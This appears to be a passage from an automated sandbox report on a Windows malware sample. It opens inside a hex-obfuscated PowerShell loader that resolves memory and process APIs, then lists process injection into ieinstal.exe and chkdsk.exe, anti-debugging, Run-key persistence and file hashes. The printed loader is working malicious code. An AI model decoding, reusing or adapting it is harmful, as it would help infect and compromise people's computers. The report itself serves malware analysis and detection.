'A48E8483929AD9939B9B';$Bugvgs1=Polygraphically0 'BA9E94859884989183D9A09E99C4C5D9A29984969192B996839E8192BA92839F989384';$Bugvgs2=Polygraphically0 'B09283A7859894B6939385928484';$Bugvgs3=Polygraphically0 'A48E8483929AD9A58299839E9A92D9BE998392859887A49285819E949284D9BF9699939B92A59291';$Bugvgs4=Polygraphically0 '8483859E9990';$Bugvgs5=Polygraphically0 'B09283BA9893829B92BF9699939B92';$Bugvgs6=Polygraphically0 'A5A3A48792949E969BB9969A92DBD7BF9E9392B58EA49E90DBD7A782959B9E94';$Bugvgs7=Polygraphically0 'A58299839E9A92DBD7BA969996909293';$Bugvgs8=Polygraphically0 'A592919B9294839293B3929B9290968392';$Bugvgs9=Polygraphically0 'BE99BA929A98858EBA9893829B92';$Slambades0=Polygraphically0 'BA8EB3929B9290968392A38E8792';$Slambades1=Polygraphically0 'B49B968484DBD7A782959B9E94DBD7A492969B9293DBD7B699849EB49B968484DBD7B6828398B49B968484';$Slambades2=Polygraphically0 'BE9981989C92';$Slambades3=Polygraphically0 'A782959B9E94DBD7BF9E9392B58EA49E90DBD7B99280A49B9883DBD7A19E858382969B';$Slambades4=Polygraphically0 'A19E858382969BB69B9B9894';$Slambades5=Polygraphically0 '9983939B9B';$Slambades6=Polygraphically0 'B983A7859883929483A19E858382969BBA929A98858E';$Slambades7=Polygraphically0 'BEB2AF';$Slambades8=Polygraphically0 'AB';$Nondestruction=Polygraphically0 'A2A4B2A5C4C5';$Politiaktioner=Polygraphically0 'B4969B9BA09E99939880A7859894B6';function fkp {Param ($Betagedes, $Jonatan) ;$Rettighedstabs0 =Polygraphically0 'D3BF9299809E8492D7CAD7DFACB68787B3989A969E99AACDCDB4828585929983B3989A969E99D9B09283B68484929A959B9E9284DFDED78BD7A09F928592DAB8959D929483D78CD7D3A8D9B09B9895969BB68484929A959B8EB496949F92D7DAB69993D7D3A8D9BB989496839E9899D9A4879B9E83DFD3A49B969A9596939284CFDEACDAC6AAD9B28682969B84DFD3B58290819084C7DED78ADED9B09283A38E8792DFD3B58290819084C6DE';&($Slambades7) $Rettighedstabs0;$Rettighedstabs5 = Polygraphically0 'D3B09B968485989285D7CAD7D3BF9299809E8492D9B09283BA92839F9893DFD3B58290819084C5DBD7ACA38E8792ACAAAAD7B7DFD3B58290819084C4DBD7D3B58290819084C3DEDE';&($Slambades7) $Rettighedstabs5;$Rettighedstabs1 = Polygraphically0 '859283828599D7D3B09B968485989285D9BE9981989C92DFD399829B9BDBD7B7DFACA48E8483929AD9A58299839E9A92D9BE998392859887A49285819E949284D9BF9699939B92A59291AADFB99280DAB8959D929483D7A48E8483929AD9A58299839E9A92D9BE998392859887A49285819E949284D9BF9699939B92A59291DFDFB99280DAB8959D929483D7BE9983A78385DEDBD7DFD3BF9299809E8492D9B09283BA92839F9893DFD3B58290819084C2DEDED9BE9981989C92DFD399829B9BDBD7B7DFD3B59283969092939284DEDEDEDEDBD7D3BD989996839699DEDE';&($Slambades7) $Rettighedstabs1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Tripyrenous,[Parameter(Position = 1)] [Type] $Jagtfalkenes = [Void]);$Rettighedstabs2 = Polygraphically0 'D3B9968382859B9E909F92939285D7CAD7ACB68787B3989A969E99AACDCDB4828585929983B3989A969E99D9B392919E9992B38E99969A9E94B68484929A959B8EDFDFB99280DAB8959D929483D7A48E8483929AD9A592919B9294839E9899D9B68484929A959B8EB9969A92DFD3B58290819084CFDEDEDBD7ACA48E8483929AD9A592919B9294839E9899D9B29A9E83D9B68484929A959B8EB5829E9B939285B69494928484AACDCDA58299DED9B392919E9992B38E99969A9E94BA9893829B92DFD3B58290819084CEDBD7D391969B8492DED9B392919E9992A38E8792DFD3A49B969A9596939284C7DBD7D3A49B969A9596939284C6DBD7ACA48E8483929AD9BA829B839E94968483B3929B9290968392AADE';&($Slambades7) $Rettighedstabs2;$Rettighedstabs3 = Polygraphically0 'D3B9968382859B9E909F92939285D9B392919E9992B498998483858294839885DFD3B58290819084C1DBD7ACA48E8483929AD9A592919B9294839E9899D9B4969B9B9E9990B49899819299839E989984AACDCDA483969993968593DBD7D3A3859E878E859299988284DED9A49283BE9A879B929A92998396839E9899B19B969084DFD3B58290819084C0DE';&($Slambades7) $Rettighedstabs3;$Rettighedstabs4 = Polygraphically0 'D3B9968382859B9E909F92939285D9B392919E9992BA92839F9893DFD3A49B969A9596939284C5DBD7D3A49B969A9596939284C4DBD7D3BD96908391969B9C92999284DBD7D3A3859E878E859299988284DED9A49283BE9A879B929A92998396839E9899B19B969084DFD3B58290819084C0DE';&($Slambades7) $Rettighedstabs4;$Rettighedstabs5 = Polygraphically0 '859283828599D7D3B9968382859B9E909F92939285D9B48592968392A38E8792DFDE';&($Slambades7) $Rettighedstabs5 ;}$Panteforskrivnings = Polygraphically0 '9C928599929BC4C5';$Rettighedstabs6 = Polygraphically0 'D3AE8198999996D7CAD7ACA48E8483929AD9A58299839E9A92D9BE998392859887A49285819E949284D9BA9685849F969BAACDCDB09283B3929B9290968392B19885B1829994839E9899A7989E99839285DFDF919C87D7D3A796998392919885849C859E81999E999084D7D3A49B969A9596939284C3DEDBD7DFB0B3A3D7B7DFACBE9983A78385AADBD7ACA2BE9983C4C5AADBD7ACA2BE9983C4C5AADBD7ACA2BE9983C4C5AADED7DFACBE9983A78385AADEDEDE';&($Slambades7) $Rettighedstabs6;$Semiformed = fkp $Slambades5 $Slambades6;$Rettighedstabs7 = Polygraphically0 'D3A29383858E9C849198859A9284C4D7CAD7D3AE8198999996D9BE9981989C92DFACBE9983A78385AACDCDAD928598DBD7C1C3C2DBD7C78FC4C7C7C7DBD7C78FC3C7DE';&($Slambades7) $Rettighedstabs7;$Rettighedstabs8 = Polygraphically0 'D3B699839E959E98839E9C9684D7CAD7D3AE8198999996D9BE9981989C92DFACBE9983A78385AACDCDAD928598DBD7CFC0C6C2C3C1CFCFDBD7C78FC4C7C7C7DBD7C78FC3DE';&($Slambades7) $Rettighedstabs8;$Udtryksformes00='HKCU:\Sorosphere\Laboranters';$Udtryksformes01 =Polygraphically0 'D3BB9E9B9D96CADFB09283DABE83929AA78598879285838ED7DAA796839FD7D3A29383858E9C849198859A9284C7C7DED9A4929B81919B929B8492';&($Slambades7) $Udtryksformes01;$Rettighedstabs9 = Polygraphically0 'D3A59283839E909F92938483969584D7CAD7ACA48E8483929AD9B4989981928583AACDCDB185989AB5968492C1C3A483859E9990DFD3BB9E9B9D96DE';&($Slambades7) $Rettighedstabs9;$Lilja0 = Polygraphically0 'ACA48E8483929AD9A58299839E9A92D9BE998392859887A49285819E949284D9BA9685849F969BAACDCDB498878EDFD3A59283839E909F92938483969584DBD7C7DBD7D7D3A29383858E9C849198859A9284C4DBD7C1C3C2DE';&($Slambades7) $Lilja0;$Muhamedaneren=$Rettighedstabs.count-645;$Lilja1 = Polygraphically0 'ACA48E8483929AD9A58299839E9A92D9BE998392859887A49285819E949284D9BA9685849F969BAACDCDB498878EDFD3A59283839E909F92938483969584DBD7C1C3C2DBD7D3B699839E959E98839E9C9684DBD7D3BA829F969A9293969992859299DE';&($Slambades7) $Lilja1;$Lilja2 = Polygraphically0 'D3B69B84839293D7CAD7ACA48E8483929AD9A58299839E9A92D9BE998392859887A49285819E949284D9BA9685849F969BAACDCDB09283B3929B9290968392B19885B1829994839E9899A7989E99839285DFDF919C87D7D3B9989993928483858294839E9899D7D3A7989B9E839E969C839E98999285DEDBD7DFB0B3A3D7B7DFACBE9983A78385AADBD7ACBE9983A78385AADBD7ACBE9983A78385AADBD7ACBE9983A78385AADBD7ACBE9983A78385AADED7DFACBE9983A78385AADEDEDE';&($Slambades7) $Lilja2;$Lilja3 = Polygraphically0 'D3B69B84839293D9BE9981989C92DFD3A29383858E9C849198859A9284C4DBD3B699839E959E98839E9C9684DBD3A4929A9E9198859A9293DBC7DBC7DE';&($Slambades7) $Lilja3#"4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"5⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SysWOW64\chkdsk.exe"C:\Windows\SysWOW64\chkdsk.exe"2⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4204 -s 1404⤵
- Program crash
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 472 -p 4204 -ip 42041⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
836KB
-
Filesize
924KB
-
Filesize
924KB
-
Filesize
572KB
-
Filesize
3.3MB
-
Filesize
40KB
-
Filesize
40KB
-
Filesize
180KB
-
Filesize
120KB
-
Filesize
4KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
600KB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
408KB
-
Filesize
83.1MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.2MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
216KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
83.1MB
-
Filesize
83.1MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
83.1MB
-
Filesize
3.3MB
-
Filesize
2.2MB